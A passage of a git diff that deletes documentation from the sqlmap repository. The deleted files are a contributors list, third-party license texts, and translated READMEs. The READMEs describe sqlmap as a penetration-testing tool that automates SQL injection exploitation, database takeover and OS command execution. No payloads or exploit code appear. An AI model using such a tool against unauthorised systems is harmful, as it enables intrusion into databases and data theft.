README.md - -Stuffe, -* for reporting a minor bug and a feature request - -Sylphid, -* for suggesting some features - -syssecurity.info, -* for reporting a minor bug - -This LittlePiggy, -* for reporting a minor bug - -ToR, -* for reporting considerable amount of bugs -* for suggesting a feature - -ultramegaman, -* for reporting a minor bug - -Vinicius, -* for reporting a minor bug - -wanglei, -* for reporting a minor bug - -warninggp, -* for reporting a few minor bugs - -x, -* for reporting a bug - -zhouhx, -* for contributing a minor patch - -# Organizations - -Black Hat team, -* for the opportunity to present my research titled 'Advanced SQL injection to operating system full control' at Black Hat Europe 2009 Briefings on April 16, 2009 in Amsterdam (NL). I unveiled and demonstrated some of the sqlmap 0.7 release candidate version new features during my presentation - * Homepage: http://goo.gl/BKfs7 - * Slides: http://goo.gl/Dh65t - * White paper: http://goo.gl/spX3N - -SOURCE Conference team, -* for the opportunity to present my research titled 'Expanding the control over the operating system from the database' at SOURCE Conference 2009 on September 21, 2009 in Barcelona (ES). I unveiled and demonstrated some of the sqlmap 0.8 release candidate version new features during my presentation - * Homepage: http://goo.gl/IeXV4 - * Slides: http://goo.gl/OKnfj - -AthCon Conference team, -* for the opportunity to present my research titled 'Got database access? Own the network!' at AthCon Conference 2010 on June 3, 2010 in Athens (GR). 
I unveiled and demonstrated some of the sqlmap 0.8 version features during my presentation - * Homepage: http://goo.gl/Fs71I - * Slides: http://goo.gl/QMfjO - -Metasploit Framework development team, -* for their powerful tool Metasploit Framework, used by sqlmap, among others things, to create the shellcode and establish an out-of-band connection between sqlmap and the database server - * Homepage: http://www.metasploit.com - -OWASP Board, -* for sponsoring part of the sqlmap development in the context of OWASP Spring of Code 2007 - * Homepage: http://www.owasp.org diff --git a/doc/THIRD-PARTY.md b/doc/THIRD-PARTY.md deleted file mode 100644 index f2479b31..00000000 --- a/doc/THIRD-PARTY.md +++ /dev/null @@ -1,314 +0,0 @@ -This file lists bundled packages and their associated licensing terms. - -# BSD - -* The Ansistrm library located under thirdparty/ansistrm/. - Copyright (C) 2010-2012, Vinay Sajip. -* The Beautiful Soup library located under thirdparty/beautifulsoup/. - Copyright (C) 2004-2010, Leonard Richardson. -* The ClientForm library located under thirdparty/clientform/. - Copyright (C) 2002-2007, John J. Lee. - Copyright (C) 2005, Gary Poster. - Copyright (C) 2005, Zope Corporation. - Copyright (C) 1998-2000, Gisle Aas. -* The Colorama library located under thirdparty/colorama/. - Copyright (C) 2010, Jonathan Hartley. -* The Fcrypt library located under thirdparty/fcrypt/. - Copyright (C) 2000, 2001, 2004 Carey Evans. -* The Odict library located under thirdparty/odict/. - Copyright (C) 2005, Nicola Larosa, Michael Foord. -* The Oset library located under thirdparty/oset/. - Copyright (C) 2010, BlueDynamics Alliance, Austria. - Copyright (C) 2009, Raymond Hettinger, and others. -* The PrettyPrint library located under thirdparty/prettyprint/. - Copyright (C) 2010, Chris Hall. -* The SocksiPy library located under thirdparty/socks/. - Copyright (C) 2006, Dan-Haim. 
- -```` -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions are met: - - Redistributions of source code must retain the above copyright - notice, this list of conditions and the following disclaimer. - - Redistributions in binary form must reproduce the above copyright - notice, this list of conditions and the following disclaimer in the - documentation and/or other materials provided with the distribution. - - Neither the name of the nor the - names of its contributors may be used to endorse or promote products - derived from this software without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -DISCLAIMED. IN NO EVENT SHALL BE LIABLE FOR ANY -DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -```` - -# LGPL - -* The Chardet library located under thirdparty/chardet/. - Copyright (C) 2008, Mark Pilgrim. -* The Gprof2dot library located under thirdparty/gprof2dot/. - Copyright (C) 2008-2009, Jose Fonseca. -* The KeepAlive library located under thirdparty/keepalive/. - Copyright (C) 2002-2003, Michael D. Stenner. -* The MultipartPost library located under thirdparty/multipart/. - Copyright (C) 2006, Will Holcomb. -* The XDot library located under thirdparty/xdot/. - Copyright (C) 2008, Jose Fonseca. -* The icmpsh tool located under extra/icmpsh/. 
- Copyright (C) 2010, Nico Leidecker, Bernardo Damele. - -```` - GNU LESSER GENERAL PUBLIC LICENSE - Version 3, 29 June 2007 - - Copyright (C) 2007 Free Software Foundation, Inc. - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - - This version of the GNU Lesser General Public License incorporates -the terms and conditions of version 3 of the GNU General Public -License, supplemented by the additional permissions listed below. - - 0. Additional Definitions. - - As used herein, "this License" refers to version 3 of the GNU Lesser -General Public License, and the "GNU GPL" refers to version 3 of the GNU -General Public License. - - "The Library" refers to a covered work governed by this License, -other than an Application or a Combined Work as defined below. - - An "Application" is any work that makes use of an interface provided -by the Library, but which is not otherwise based on the Library. -Defining a subclass of a class defined by the Library is deemed a mode -of using an interface provided by the Library. - - A "Combined Work" is a work produced by combining or linking an -Application with the Library. The particular version of the Library -with which the Combined Work was made is also called the "Linked -Version". - - The "Minimal Corresponding Source" for a Combined Work means the -Corresponding Source for the Combined Work, excluding any source code -for portions of the Combined Work that, considered in isolation, are -based on the Application, and not on the Linked Version. - - The "Corresponding Application Code" for a Combined Work means the -object code and/or source code for the Application, including any data -and utility programs needed for reproducing the Combined Work from the -Application, but excluding the System Libraries of the Combined Work. - - 1. Exception to Section 3 of the GNU GPL. 
- - You may convey a covered work under sections 3 and 4 of this License -without being bound by section 3 of the GNU GPL. - - 2. Conveying Modified Versions. - - If you modify a copy of the Library, and, in your modifications, a -facility refers to a function or data to be supplied by an Application -that uses the facility (other than as an argument passed when the -facility is invoked), then you may convey a copy of the modified -version: - - a) under this License, provided that you make a good faith effort to - ensure that, in the event an Application does not supply the - function or data, the facility still operates, and performs - whatever part of its purpose remains meaningful, or - - b) under the GNU GPL, with none of the additional permissions of - this License applicable to that copy. - - 3. Object Code Incorporating Material from Library Header Files. - - The object code form of an Application may incorporate material from -a header file that is part of the Library. You may convey such object -code under terms of your choice, provided that, if the incorporated -material is not limited to numerical parameters, data structure -layouts and accessors, or small macros, inline functions and templates -(ten or fewer lines in length), you do both of the following: - - a) Give prominent notice with each copy of the object code that the - Library is used in it and that the Library and its use are - covered by this License. - - b) Accompany the object code with a copy of the GNU GPL and this license - document. - - 4. Combined Works. 
- - You may convey a Combined Work under terms of your choice that, -taken together, effectively do not restrict modification of the -portions of the Library contained in the Combined Work and reverse -engineering for debugging such modifications, if you also do each of -the following: - - a) Give prominent notice with each copy of the Combined Work that - the Library is used in it and that the Library and its use are - covered by this License. - - b) Accompany the Combined Work with a copy of the GNU GPL and this license - document. - - c) For a Combined Work that displays copyright notices during - execution, include the copyright notice for the Library among - these notices, as well as a reference directing the user to the - copies of the GNU GPL and this license document. - - d) Do one of the following: - - 0) Convey the Minimal Corresponding Source under the terms of this - License, and the Corresponding Application Code in a form - suitable for, and under terms that permit, the user to - recombine or relink the Application with a modified version of - the Linked Version to produce a modified Combined Work, in the - manner specified by section 6 of the GNU GPL for conveying - Corresponding Source. - - 1) Use a suitable shared library mechanism for linking with the - Library. A suitable mechanism is one that (a) uses at run time - a copy of the Library already present on the user's computer - system, and (b) will operate properly with a modified version - of the Library that is interface-compatible with the Linked - Version. - - e) Provide Installation Information, but only if you would otherwise - be required to provide such information under section 6 of the - GNU GPL, and only to the extent that such information is - necessary to install and execute a modified version of the - Combined Work produced by recombining or relinking the - Application with a modified version of the Linked Version. 
(If - you use option 4d0, the Installation Information must accompany - the Minimal Corresponding Source and Corresponding Application - Code. If you use option 4d1, you must provide the Installation - Information in the manner specified by section 6 of the GNU GPL - for conveying Corresponding Source.) - - 5. Combined Libraries. - - You may place library facilities that are a work based on the -Library side by side in a single library together with other library -facilities that are not Applications and are not covered by this -License, and convey such a combined library under terms of your -choice, if you do both of the following: - - a) Accompany the combined library with a copy of the same work based - on the Library, uncombined with any other library facilities, - conveyed under the terms of this License. - - b) Give prominent notice with the combined library that part of it - is a work based on the Library, and explaining where to find the - accompanying uncombined form of the same work. - - 6. Revised Versions of the GNU Lesser General Public License. - - The Free Software Foundation may publish revised and/or new versions -of the GNU Lesser General Public License from time to time. Such new -versions will be similar in spirit to the present version, but may -differ in detail to address new problems or concerns. - - Each version is given a distinguishing version number. If the -Library as you received it specifies that a certain numbered version -of the GNU Lesser General Public License "or any later version" -applies to it, you have the option of following the terms and -conditions either of that published version or of any later version -published by the Free Software Foundation. If the Library as you -received it does not specify a version number of the GNU Lesser -General Public License, you may choose any version of the GNU Lesser -General Public License ever published by the Free Software Foundation. 
- - If the Library as you received it specifies that a proxy can decide -whether future versions of the GNU Lesser General Public License shall -apply, that proxy's public statement of acceptance of any version is -permanent authorization for you to choose that version for the -Library. -```` - -# PSF - -* The Magic library located under thirdparty/magic/. - Copyright (C) 2011, Adam Hupp. - -```` -PSF LICENSE AGREEMENT FOR PYTHON 2.7.3 - -This LICENSE AGREEMENT is between the Python Software Foundation (“PSFâ€), -and the Individual or Organization (“Licenseeâ€) accessing and otherwise -using Python 2.7.3 software in source or binary form and its associated -documentation. -Subject to the terms and conditions of this License Agreement, PSF hereby -grants Licensee a nonexclusive, royalty-free, world-wide license to -reproduce, analyze, test, perform and/or display publicly, prepare -derivative works, distribute, and otherwise use Python 2.7.3 alone or in any -derivative version, provided, however, that PSF’s License Agreement and -PSF’s notice of copyright, i.e., “Copyright © 2001-2012 Python Software -Foundation; All Rights Reserved†are retained in Python 2.7.3 alone or in -any derivative version prepared by Licensee. -In the event Licensee prepares a derivative work that is based on or -incorporates Python 2.7.3 or any part thereof, and wants to make the -derivative work available to others as provided herein, then Licensee hereby -agrees to include in any such work a brief summary of the changes made to -Python 2.7.3. -PSF is making Python 2.7.3 available to Licensee on an “AS IS†basis. PSF -MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF -EXAMPLE, BUT NOT LIMITATION, PSF MAKES NO AND DISCLAIMS ANY REPRESENTATION -OR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT -THE USE OF PYTHON 2.7.3 WILL NOT INFRINGE ANY THIRD PARTY RIGHTS. 
-PSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON 2.7.3 FOR -ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF -MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON 2.7.3, OR ANY DERIVATIVE -THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF. -This License Agreement will automatically terminate upon a material breach -of its terms and conditions. -Nothing in this License Agreement shall be deemed to create any relationship -of agency, partnership, or joint venture between PSF and Licensee. This -License Agreement does not grant permission to use PSF trademarks or trade -name in a trademark sense to endorse or promote products or services of -Licensee, or any third party. -By copying, installing or otherwise using Python 2.7.3, Licensee agrees to -be bound by the terms and conditions of this License Agreement. -```` - -# MIT - -* The bottle web framework library located under thirdparty/bottle/. - Copyright (C) 2012, Marcel Hellkamp. -* The PageRank library located under thirdparty/pagerank/. - Copyright (C) 2010, Corey Goldberg. -* The Termcolor library located under thirdparty/termcolor/. - Copyright (C) 2008-2011, Volvox Development Team. - -```` -Permission is hereby granted, free of charge, to any person obtaining -a copy of this software and associated documentation files (the -"Software"), to deal in the Software without restriction, including -without limitation the rights to use, copy, modify, merge, publish, -distribute, sublicense, and/or sell copies of the Software, and to -permit persons to whom the Software is furnished to do so, subject to -the following conditions: - -The above copyright notice and this permission notice shall be -included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, -EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF -MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND -NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE -LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION -OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION -WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - -```` - -# Public domain - -* The PyDes library located under thirdparty/pydes/. - Copyleft 2009, Todd Whiteman. diff --git a/doc/translations/README-es-MX.md b/doc/translations/README-es-MX.md deleted file mode 100644 index 32ca795a..00000000 --- a/doc/translations/README-es-MX.md +++ /dev/null @@ -1,52 +0,0 @@ -# sqlmap - -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) - -sqlmap es una herramienta para pruebas de penetración "penetration testing" de software libre que automatiza el proceso de detección y explotación de fallos mediante inyección de SQL además de tomar el control de servidores de bases de datos. Contiene un poderoso motor de detección, así como muchas de las funcionalidades escenciales para el "pentester" y una amplia gama de opciones desde la recopilación de información para identificar el objetivo conocido como "fingerprinting" mediante la extracción de información de la base de datos, hasta el acceso al sistema de archivos subyacente para ejecutar comandos en el sistema operativo a través de conexiones alternativas conocidas como "Out-of-band". 
- -Capturas de Pantalla ---- -![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) - -Visita la [colección de capturas de pantalla](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demuestra algunas de las características en la documentación(wiki). - -Instalación ---- - -Se puede descargar el "tarball" más actual haciendo clic [aquí](https://github.com/sqlmapproject/sqlmap/tarball/master) o el "zipball" [aquí](https://github.com/sqlmapproject/sqlmap/zipball/master). - -Preferentemente, se puede descargar sqlmap clonando el repositorio [Git](https://github.com/sqlmapproject/sqlmap): - - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev - -sqlmap funciona con las siguientes versiones de [Python](http://www.python.org/download/) ** 2.6.x** y ** 2.7.x** en cualquier plataforma. - -Uso ---- - -Para obtener una lista de opciones básicas: - - python sqlmap.py -h - -Para obtener una lista de todas las opciones: - - python sqlmap.py -hh - -Se puede encontrar una muestra de su funcionamiento [aquí](https://gist.github.com/stamparm/5335217). -Para obtener una visión general de las capacidades de sqlmap, así como un listado funciones soportadas y descripción de todas las opciones y modificadores, junto con ejemplos, se recomienda consultar el [manual de usuario](https://github.com/sqlmapproject/sqlmap/wiki). - -Enlaces ---- - -* Página principal: http://sqlmap.org -* Descargar: [. 
tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) o [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) -* Fuente de Cambios "Commit RSS feed": https://github.com/sqlmapproject/sqlmap/commits/master.atom -* Seguimiento de problemas "Issue tracker": https://github.com/sqlmapproject/sqlmap/issues -* Manual de usuario: https://github.com/sqlmapproject/sqlmap/wiki -* Preguntas frecuentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Subscripción a la lista de correo: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* Fuente de la lista de correo "RSS feed": http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Archivos de lista de correo: http://news.gmane.org/gmane.comp.security.sqlmap -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demostraciones: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) -* Imágenes: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-gr-GR.md b/doc/translations/README-gr-GR.md deleted file mode 100644 index bb7b5a46..00000000 --- a/doc/translations/README-gr-GR.md +++ /dev/null @@ -1,53 +0,0 @@ -# sqlmap - -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) - -Το sqlmap είναι Ï€ÏόγÏαμμα Î±Î½Î¿Î¹Ï‡Ï„Î¿Ï ÎºÏŽÎ´Î¹ÎºÎ±, που αυτοματοποιεί την εÏÏεση και εκμετάλλευση ευπαθειών Ï„Ïπου SQL Injection σε βάσεις δεδομένων. 
ΈÏχεται με μια δυνατή μηχανή αναγνώÏισης ευπαθειών, πολλά εξειδικευμένα χαÏακτηÏιστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εÏÏος επιλογών αÏχίζοντας από την αναγνώÏιση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχÏι και Ï€Ïόσβαση στο βαθÏτεÏο σÏστημα αÏχείων και εκτέλεση εντολών στο απευθείας στο λειτουÏγικό μέσω εκτός ζώνης συνδέσεων. - -Εικόνες ----- - -![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) - -ΜποÏείτε να επισκεφτείτε τη [συλλογή από εικόνες](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) που επιδεικνÏουν κάποια από τα χαÏακτηÏιστικά. - -Εγκατάσταση ----- - -Έχετε τη δυνατότητα να κατεβάσετε την τελευταία tarball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/tarball/master) ή την τελευταία zipball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/zipball/master). - -Κατά Ï€Ïοτίμηση, μποÏείτε να κατεβάσετε το sqlmap κάνοντας κλώνο το [Git](https://github.com/sqlmapproject/sqlmap) αποθετήÏιο: - - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev - -Το sqlmap λειτουÏγεί χωÏίς πεÏαιτέÏω κόπο με την [Python](http://www.python.org/download/) έκδοσης **2.6.x** και **2.7.x** σε όποια πλατφόÏμα. - -ΧÏήση ----- - -Για να δείτε μια βασική λίστα από επιλογές πατήστε: - - python sqlmap.py -h - -Για να πάÏετε μια λίστα από όλες τις επιλογές πατήστε: - - python sqlmap.py -hh - -ΜποÏείτε να δείτε ένα δείγμα λειτουÏγίας του Ï€ÏογÏάμματος [εδώ](https://gist.github.com/stamparm/5335217). -Για μια γενικότεÏη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηÏιζόμενων χαÏακτηÏιστικών και πεÏιγÏαφή για όλες τις επιλογές, μαζί με παÏαδείγματα, καλείστε να συμβουλευτείτε το [εγχειÏίδιο χÏήστη](https://github.com/sqlmapproject/sqlmap/wiki). 
- -ΣÏνδεσμοι ----- - -* ΑÏχική σελίδα: http://sqlmap.org -* Λήψεις: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ή [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) -* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* ΠÏοβλήματα: https://github.com/sqlmapproject/sqlmap/issues -* ΕγχειÏίδιο ΧÏήστη: https://github.com/sqlmapproject/sqlmap/wiki -* Συχνές ΕÏωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* ΕγγÏαφή σε Mailing list: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Mailing list αÏχείο: http://news.gmane.org/gmane.comp.security.sqlmap -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) -* Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-hr-HR.md b/doc/translations/README-hr-HR.md deleted file mode 100644 index f603389b..00000000 --- a/doc/translations/README-hr-HR.md +++ /dev/null @@ -1,53 +0,0 @@ -# sqlmap - -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) - -sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. 
Dolazi s moćnim mehanizmom za detekciju, mnoÅ¡tvom korisnih opcija za napredno penetracijsko testiranje te Å¡iroki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datoteÄnom sustavu i izvrÅ¡avanja komandi na operacijskom sustavu koriÅ¡tenjem tzv. "out-of-band" veza. - -Slike zaslona ----- - -![Slika zaslona](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) - -Možete posjetiti [kolekciju slika zaslona](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gdje se demonstriraju neke od znaÄajki na wiki stranicama. - -Instalacija ----- - -Možete preuzeti zadnji tarball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/tarball/master) ili zadnji zipball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/zipball/master). - -Po mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija: - - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev - -sqlmap radi bez posebnih zahtjeva koriÅ¡tenjem [Python](http://www.python.org/download/) verzije **2.6.x** i/ili **2.7.x** na bilo kojoj platformi. - -KoriÅ¡tenje ----- - -Kako biste dobili listu osnovnih opcija i prekidaÄa koristite: - - python sqlmap.py -h - -Kako biste dobili listu svih opcija i prekidaÄa koristite: - - python sqlmap.py -hh - -Možete pronaći primjer izvrÅ¡avanja [ovdje](https://gist.github.com/stamparm/5335217). -Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih znaÄajki te opis svih opcija i prekidaÄa, zajedno s primjerima, preporuÄen je uvid u [korisniÄki priruÄnik](https://github.com/sqlmapproject/sqlmap/wiki). 
- -Poveznice ----- - -* PoÄetna stranica: http://sqlmap.org -* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) -* RSS feed promjena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues -* KorisniÄki priruÄnik: https://github.com/sqlmapproject/sqlmap/wiki -* NajÄešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Pretplata na mailing listu: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* RSS feed mailing liste: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Arhiva mailing liste: http://news.gmane.org/gmane.comp.security.sqlmap -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) -* Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-id-ID.md b/doc/translations/README-id-ID.md deleted file mode 100644 index 80113759..00000000 --- a/doc/translations/README-id-ID.md +++ /dev/null @@ -1,54 +0,0 @@ -# sqlmap - -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) - -sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basisdata. 
sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur hanal bagi _penetration tester_, beragam cara untuk mendeteksi basisdata, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_. - -Tangkapan Layar ----- - -![Tangkapan Layar](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) - -Anda dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki. - -Instalasi ----- - -Anda dapat mengunduh tarball versi terbaru [di sini] -(https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master). - -Sebagai alternatif, Anda dapat mengunduh sqlmap dengan men-_clone_ repositori [Git](https://github.com/sqlmapproject/sqlmap): - - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev - -sqlmap berfungsi langsung pada [Python](http://www.python.org/download/) versi **2.6.x** dan **2.7.x** pada platform apapun. - -Penggunaan ----- - -Untuk mendapatkan daftar opsi dasar gunakan: - - python sqlmap.py -h - -Untuk mendapatkan daftar opsi lanjut gunakan: - - python sqlmap.py -hh - -Anda dapat mendapatkan contoh penggunaan [di sini](https://gist.github.com/stamparm/5335217). -Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [manual pengguna](https://github.com/sqlmapproject/sqlmap/wiki). 
- -Tautan ----- - -* Situs: http://sqlmap.org -* Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) -* RSS feed dari commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues -* Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki -* Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Berlangganan milis: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* RSS feed dari milis: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Arsip milis: http://news.gmane.org/gmane.comp.security.sqlmap -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Video Demo [#1](http://www.youtube.com/user/inquisb/videos) dan [#2](http://www.youtube.com/user/stamparm/videos) -* Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-pt-BR.md b/doc/translations/README-pt-BR.md deleted file mode 100644 index 6c86c308..00000000 --- a/doc/translations/README-pt-BR.md +++ /dev/null @@ -1,54 +0,0 @@ -# sqlmap - -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) - -sqlmap é uma ferramenta de teste de penetração de código aberto que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. 
Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de penetração por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional. - -Imagens ----- - -![Imagem](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) - -Você pode visitar a [coleção de imagens](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demonstra alguns dos recursos apresentados na wiki. - -Instalação ----- - -Você pode baixar o arquivo tar mais recente clicando [aqui] -(https://github.com/sqlmapproject/sqlmap/tarball/master) ou o arquivo zip mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/zipball/master). - -De preferência, você pode baixar o sqlmap clonando o repositório [Git](https://github.com/sqlmapproject/sqlmap): - - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev - -sqlmap funciona em [Python](http://www.python.org/download/) nas versões **2.6.x** e **2.7.x** em todas as plataformas. - -Como usar ----- - -Para obter uma lista das opções básicas faça: - - python sqlmap.py -h - -Para obter a lista completa de opções faça: - - python sqlmap.py -hh - -Você pode encontrar alguns exemplos [aqui](https://gist.github.com/stamparm/5335217). -Para ter uma visão geral dos recursos do sqlmap, lista de recursos suportados e a descrição de 